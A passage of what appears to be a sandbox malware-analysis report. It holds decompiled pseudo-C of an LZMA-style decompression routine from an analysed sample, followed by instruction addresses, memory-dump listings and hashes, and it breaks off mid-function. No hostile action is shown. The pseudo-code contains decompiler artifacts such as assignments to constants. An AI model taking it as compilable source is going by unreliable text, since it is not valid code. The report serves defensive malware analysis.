                    											case 0xa:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x84) = 0xb;
                    													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    													while(1) {
                    														L132:
                    														 *(_t621 - 0x54) = _t614;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x28);
                    												goto L88;
                    											case 0xb:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__ecx =  *(__ebp - 0x24);
                    													__eax =  *(__ebp - 0x20);
                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												} else {
                    													__eax =  *(__ebp - 0x24);
                    												}
                    												__ecx =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												L88:
                    												__ecx =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x2c) = __eax;
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												L89:
                    												__eax =  *(__ebp - 4);
                    												 *(__ebp - 0x80) = 0x15;
                    												__eax =  *(__ebp - 4) + 0xa68;
                    												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    												goto L68;
                    											case 0xc:
                    												L99:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xc;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t334 = __ebp - 0x70;
                    												 *_t334 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t334;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												__eax =  *(__ebp - 0x2c);
                    												goto L101;
                    											case 0xd:
                    												L37:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xd;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t122 = __ebp - 0x70;
                    												 *_t122 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t122;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L39:
                    												__eax =  *(__ebp - 0x40);
                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    													goto L48;
                    												}
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													goto L54;
                    												}
                    												L41:
                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    												 *(__ebp - 0x48) = __eax;
                    												__eax = __eax + 1;
                    												__eax = __eax << 8;
                    												__eax = __eax + __ebx;
                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edx = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													 *(__ebp - 0x40) = 1;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													__ebx = __ebx + __ebx + 1;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edx;
                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L39;
                    												} else {
                    													goto L37;
                    												}
                    											case 0xe:
                    												L46:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xe;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t156 = __ebp - 0x70;
                    												 *_t156 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t156;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												while(1) {
                    													L48:
                    													__eflags = __ebx - 0x100;
                    													if(__ebx >= 0x100) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x58);
                    													__edx = __ebx + __ebx;
                    													__ecx =  *(__ebp - 0x10);
                    													__esi = __edx + __eax;
                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                    													__ax =  *__esi;
                    													 *(__ebp - 0x54) = __esi;
                    													__edi = __ax & 0x0000ffff;
                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    													__eflags =  *(__ebp - 0xc) - __ecx;
                    													if( *(__ebp - 0xc) >= __ecx) {
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    														__cx = __ax;
                    														_t170 = __edx + 1; // 0x1
                    														__ebx = _t170;
                    														__cx = __ax >> 5;
                    														__eflags = __eax;
                    														 *__esi = __ax;
                    													} else {
                    														 *(__ebp - 0x10) = __ecx;
                    														0x800 = 0x800 - __edi;
                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    														__ebx = __ebx + __ebx;
                    														 *__esi = __cx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														continue;
                    													} else {
                    														goto L46;
                    													}
                    												}
                    												L54:
                    												_t173 = __ebp - 0x34;
                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    												__eflags =  *_t173;
                    												goto L55;
                    											case 0xf:
                    												L58:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xf;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t203 = __ebp - 0x70;
                    												 *_t203 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t203;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L60:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													L55:
                    													__al =  *(__ebp - 0x44);
                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    													goto L56;
                    												}
                    												L61:
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t217 = __edx + 1; // 0x1
                    													__ebx = _t217;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L60;
                    												} else {
                    													goto L58;
                    												}
                    											case 0x10:
                    												L109:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x10;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t365 = __ebp - 0x70;
                    												 *_t365 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t365;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												goto L111;
                    											case 0x11:
                    												L68:
                    												_t614 =  *(_t621 - 0x58);
                    												 *(_t621 - 0x84) = 0x12;
                    												while(1) {
                    													L132:
                    													 *(_t621 - 0x54) = _t614;
                    													goto L133;
                    												}
                    											case 0x12:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 0x58);
                    													 *(__ebp - 0x84) = 0x13;
                    													__esi =  *(__ebp - 0x58) + 2;
                    													while(1) {
                    														L132:
                    														 *(_t621 - 0x54) = _t614;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												__eflags = __eax;
                    												__eax =  *(__ebp - 0x58) + __eax + 4;
                    												goto L130;
                    											case 0x13:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													_t469 = __ebp - 0x58;
                    													 *_t469 =  *(__ebp - 0x58) + 0x204;
                    													__eflags =  *_t469;
                    													 *(__ebp - 0x30) = 0x10;
                    													 *(__ebp - 0x40) = 8;
                    													L144:
                    													 *(__ebp - 0x7c) = 0x14;
                    													goto L145;
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												 *(__ebp - 0x30) = 8;
                    												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    												L130:
                    												 *(__ebp - 0x58) = __eax;
                    												 *(__ebp - 0x40) = 3;
                    												goto L144;
                    											case 0x14:
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    												__eax =  *(__ebp - 0x80);
                    												 *(_t621 - 0x88) = _t542;
                    												goto L1;
                    											case 0x15:
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xb;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    												goto L120;
                    											case 0x16:
                    												__eax =  *(__ebp - 0x30);
                    												__eflags = __eax - 4;
                    												if(__eax >= 4) {
                    													_push(3);
                    													_pop(__eax);
                    												}
                    												__ecx =  *(__ebp - 4);
                    												 *(__ebp - 0x40) = 6;
                    												__eax = __eax << 7;
                    												 *(__ebp - 0x7c) = 0x19;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L145;
                    											case 0x17:
                    												L145:
                    												__eax =  *(__ebp - 0x40);
                    												 *(__ebp - 0x50) = 1;
                    												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    												goto L149;
                    											case 0x18:
                    												L146:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x18;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t484 = __ebp - 0x70;
                    												 *_t484 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t484;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L148:
                    												_t487 = __ebp - 0x48;
                    												 *_t487 =  *(__ebp - 0x48) - 1;
                    												__eflags =  *_t487;
                    												L149:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__ecx =  *(__ebp - 0x40);
                    													__ebx =  *(__ebp - 0x50);
                    													0 = 1;
                    													__eax = 1 << __cl;
                    													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    													__eax =  *(__ebp - 0x7c);
                    													 *(__ebp - 0x44) = __ebx;
                    													while(1) {
                    														 *(_t621 - 0x88) = _t542;
                    														goto L1;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x50);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    												__eax =  *(__ebp - 0x58);
                    												__esi = __edx + __eax;
                    												 *(__ebp - 0x54) = __esi;
                    												__ax =  *__esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													__cx = __ax >> 5;
                    													__eax = __eax - __ecx;
                    													__edx = __edx + 1;
                    													__eflags = __edx;
                    													 *__esi = __ax;
                    													 *(__ebp - 0x50) = __edx;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L148;
                    												} else {
                    													goto L146;
                    												}
                    											case 0x19:
                    												__eflags = __ebx - 4;
                    												if(__ebx < 4) {
                    													 *(__ebp - 0x2c) = __ebx;
                    													L119:
                    													_t393 = __ebp - 0x2c;
                    													 *_t393 =  *(__ebp - 0x2c) + 1;
                    													__eflags =  *_t393;
                    													L120:
                    													__eax =  *(__ebp - 0x2c);
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    														goto L170;
                    													}
                    													__eflags = __eax -  *(__ebp - 0x60);
                    													if(__eax >  *(__ebp - 0x60)) {
                    														goto L171;
                    													}
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    													__eax =  *(__ebp - 0x30);
                    													_t400 = __ebp - 0x60;
                    													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    													__eflags =  *_t400;
                    													goto L123;
                    												}
                    												__ecx = __ebx;
                    												__eax = __ebx;
                    												__ecx = __ebx >> 1;
                    												__eax = __ebx & 0x00000001;
                    												__ecx = (__ebx >> 1) - 1;
                    												__al = __al | 0x00000002;
                    												__eax = (__ebx & 0x00000001) << __cl;
                    												__eflags = __ebx - 0xe;
                    												 *(__ebp - 0x2c) = __eax;
                    												if(__ebx >= 0xe) {
                    													__ebx = 0;
                    													 *(__ebp - 0x48) = __ecx;
                    													L102:
                    													__eflags =  *(__ebp - 0x48);
                    													if( *(__ebp - 0x48) <= 0) {
                    														__eax = __eax + __ebx;
                    														 *(__ebp - 0x40) = 4;
                    														 *(__ebp - 0x2c) = __eax;
                    														__eax =  *(__ebp - 4);
                    														__eax =  *(__ebp - 4) + 0x644;
                    														__eflags = __eax;
                    														L108:
                    														__ebx = 0;
                    														 *(__ebp - 0x58) = __eax;
                    														 *(__ebp - 0x50) = 1;
                    														 *(__ebp - 0x44) = 0;
                    														 *(__ebp - 0x48) = 0;
                    														L112:
                    														__eax =  *(__ebp - 0x40);
                    														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    															_t391 = __ebp - 0x2c;
                    															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    															__eflags =  *_t391;
                    															goto L119;
                    														}
                    														__eax =  *(__ebp - 0x50);
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    														__eax =  *(__ebp - 0x58);
                    														__esi = __edi + __eax;
                    														 *(__ebp - 0x54) = __esi;
                    														__ax =  *__esi;
                    														__ecx = __ax & 0x0000ffff;
                    														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    														__eflags =  *(__ebp - 0xc) - __edx;
                    														if( *(__ebp - 0xc) >= __edx) {
                    															__ecx = 0;
                    															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    															__ecx = 1;
                    															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    															__ebx = 1;
                    															__ecx =  *(__ebp - 0x48);
                    															__ebx = 1 << __cl;
                    															__ecx = 1 << __cl;
                    															__ebx =  *(__ebp - 0x44);
                    															__ebx =  *(__ebp - 0x44) | __ecx;
                    															__cx = __ax;
                    															__cx = __ax >> 5;
                    															__eax = __eax - __ecx;
                    															__edi = __edi + 1;
                    															__eflags = __edi;
                    															 *(__ebp - 0x44) = __ebx;
                    															 *__esi = __ax;
                    															 *(__ebp - 0x50) = __edi;
                    														} else {
                    															 *(__ebp - 0x10) = __edx;
                    															0x800 = 0x800 - __ecx;
                    															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    															 *__esi = __dx;
                    														}
                    														__eflags =  *(__ebp - 0x10) - 0x1000000;
                    														if( *(__ebp - 0x10) >= 0x1000000) {
                    															L111:
                    															_t368 = __ebp - 0x48;
                    															 *_t368 =  *(__ebp - 0x48) + 1;
                    															__eflags =  *_t368;
                    															goto L112;
                    														} else {
                    															goto L109;
                    														}
                    													}
                    													__ecx =  *(__ebp - 0xc);
                    													__ebx = __ebx + __ebx;
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    														__ecx =  *(__ebp - 0x10);
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    														__ebx = __ebx | 0x00000001;
                    														__eflags = __ebx;
                    														 *(__ebp - 0x44) = __ebx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L101:
                    														_t338 = __ebp - 0x48;
                    														 *_t338 =  *(__ebp - 0x48) - 1;
                    														__eflags =  *_t338;
                    														goto L102;
                    													} else {
                    														goto L99;
                    													}
                    												}
                    												__edx =  *(__ebp - 4);
                    												__eax = __eax - __ebx;
                    												 *(__ebp - 0x40) = __ecx;
                    												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    												goto L108;
                    											case 0x1a:
                    												L56:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1a;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x68);
                    												__al =  *(__ebp - 0x5c);
                    												__edx =  *(__ebp - 8);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *( *(__ebp - 0x68)) = __al;
                    												__ecx =  *(__ebp - 0x14);
                    												 *(__ecx +  *(__ebp - 8)) = __al;
                    												__eax = __ecx + 1;
                    												__edx = 0;
                    												_t192 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t192;
                    												goto L79;
                    											case 0x1b:
                    												L75:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1b;
                    													goto L170;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t274 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t274;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												_t283 = __ebp - 0x64;
                    												 *_t283 =  *(__ebp - 0x64) - 1;
                    												__eflags =  *_t283;
                    												 *( *(__ebp - 0x68)) = __cl;
                    												L79:
                    												 *(__ebp - 0x14) = __edx;
                    												goto L80;
                    											case 0x1c:
                    												while(1) {
                    													L123:
                    													__eflags =  *(__ebp - 0x64);
                    													if( *(__ebp - 0x64) == 0) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__edx =  *(__ebp - 8);
                    													__cl =  *(__eax + __edx);
                    													__eax =  *(__ebp - 0x14);
                    													 *(__ebp - 0x5c) = __cl;
                    													 *(__eax + __edx) = __cl;
                    													__eax = __eax + 1;
                    													__edx = 0;
                    													_t414 = __eax %  *(__ebp - 0x74);
                    													__eax = __eax /  *(__ebp - 0x74);
                    													__edx = _t414;
                    													__eax =  *(__ebp - 0x68);
                    													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    													__eflags =  *(__ebp - 0x30);
                    													 *( *(__ebp - 0x68)) = __cl;
                    													 *(__ebp - 0x14) = _t414;
                    													if( *(__ebp - 0x30) > 0) {
                    														continue;
                    													} else {
                    														L80:
                    														 *(__ebp - 0x88) = 2;
                    														goto L1;
                    													}
                    												}
                    												 *(__ebp - 0x88) = 0x1c;
                    												goto L170;
                    										}
                    									}
                    									L171:
                    									_t544 = _t543 | 0xffffffff;
                    									goto L172;
                    								}
                    							}
                    						}
                    					}
                    					goto L1;
                    				}
                    			}














                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004073ce
                    0x004073cb
                    0x00000000
                    0x00407002

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040711C() {
                    				unsigned short _t531;
                    				signed int _t532;
                    				void _t533;
                    				signed int _t534;
                    				signed int _t535;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t589;
                    				signed int* _t606;
                    				void* _t613;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t613 - 0x40) != 0) {
                    						 *(_t613 - 0x84) = 0xb;
                    						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                    						goto L132;
                    					} else {
                    						__eax =  *(__ebp - 0x28);
                    						L88:
                    						 *(__ebp - 0x2c) = __eax;
                    						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    						L89:
                    						__eax =  *(__ebp - 4);
                    						 *(__ebp - 0x80) = 0x15;
                    						__eax =  *(__ebp - 4) + 0xa68;
                    						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    						L69:
                    						 *(__ebp - 0x84) = 0x12;
                    						while(1) {
                    							L132:
                    							 *(_t613 - 0x54) = _t606;
                    							while(1) {
                    								L133:
                    								_t531 =  *_t606;
                    								_t589 = _t531 & 0x0000ffff;
                    								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
